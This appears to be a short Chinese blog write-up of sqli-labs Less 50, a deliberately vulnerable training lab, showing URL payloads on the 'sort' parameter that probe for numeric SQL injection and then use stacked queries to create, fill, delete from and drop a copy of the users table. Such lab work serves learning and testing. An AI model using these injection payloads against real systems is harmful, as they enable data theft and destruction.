Sqli labs less 50

1.常规办法测试

2.将后面的内容注释掉，网页返回错误的信息。进行下面的所有测试，得出此处存在数值型注入。

?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

3.本less可以和less47~49一样使用报错注入或时间注入完成，此处用于测试堆叠注入，参考less38

?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

posted @ 2021-09-16 11:25 Nuyoah_QQ 阅读(47) 评论(0) 收藏举报

刷新页面返回顶部

Nuyoah_QQ

Sqli labs less 50

公告